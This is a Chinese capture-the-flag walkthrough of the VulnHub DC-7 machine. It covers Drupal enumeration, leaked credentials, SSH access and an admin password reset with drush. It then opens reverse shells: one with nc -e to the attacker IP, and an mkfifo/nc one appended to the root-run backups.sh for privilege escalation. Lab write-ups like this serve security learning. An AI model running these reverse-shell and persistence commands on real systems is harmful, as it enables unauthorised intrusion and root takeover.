DC7

靶机地址：https://www.vulnhub.com/entry/dc-7,356/

攻击者ip：192.168.56.108 桥接（自动） vmare

受害者ip：192.168.56.121 仅主机 vmbox

参考：https://blog.csdn.net/xdbzdgx/article/details/121729759

https://blog.csdn.net/weixin_43583637/article/details/102809227

https://blog.csdn.net/weixin_50053818/article/details/117400362

主机发现

端口扫描，22ssh，80http

输入“会有提示

框架是Drupal

cmseek -u http://192.168.56.121/

dirb http://192.168.56.121/

扫描目录，找到robots.txt，

在robots.txt找到后台登陆入口

http://192.168.56.121/user/login/

有防爆破

欢迎来到DC-7            DC-7引入了一些“新”概念，但我将让您弄清楚它们是什么。 😃            尽管此挑战并不是技术性的全部，但如果您需要诉诸于暴力破解或字典攻击，您可能不会成功。            您将要做的就是在盒子外面思考。            方式在盒子外面。 😃            

搜索@DC7USER

源码泄露，在confing.php找到账号密码

dc7user/MdR3xOgB7#dW

拿去登陆后台，密码错误

试一下ssh服务登录，登陆成功了

mbox是root发的邮件

cat /opt/scripts/backups.sh查看这个文件

gpg命令用来加密，drush命令是drupal框架中用来做一些配置的命令，它可以改变用户名密码

进入到/var/www/html目录下，猜测会有一个admin用户，所以使用drush命令修改admin用户的密码为123456，发现可以修改成功

cd /var/www/html/            drush user-password admin --password="123456"            

在Content—>Add content-->Basic page下，准备添加PHP代码反弹shell，但发现Drupal 8不支持PHP代码，百度后知道Drupal 8后为了安全，需要将php单独作为一个模块导入

安装模块

https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz            

回到之前的页面，可以添加php代码了

写上一句马

nc -e /bin/sh 192.168.56.108 2222

反弹shell

python -c 'import pty; pty.spawn("/bin/bash")'

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.108 3333 >/tmp/f" >> backups.sh            

原文始发于微信公众号（王之暴龙战神）：DC7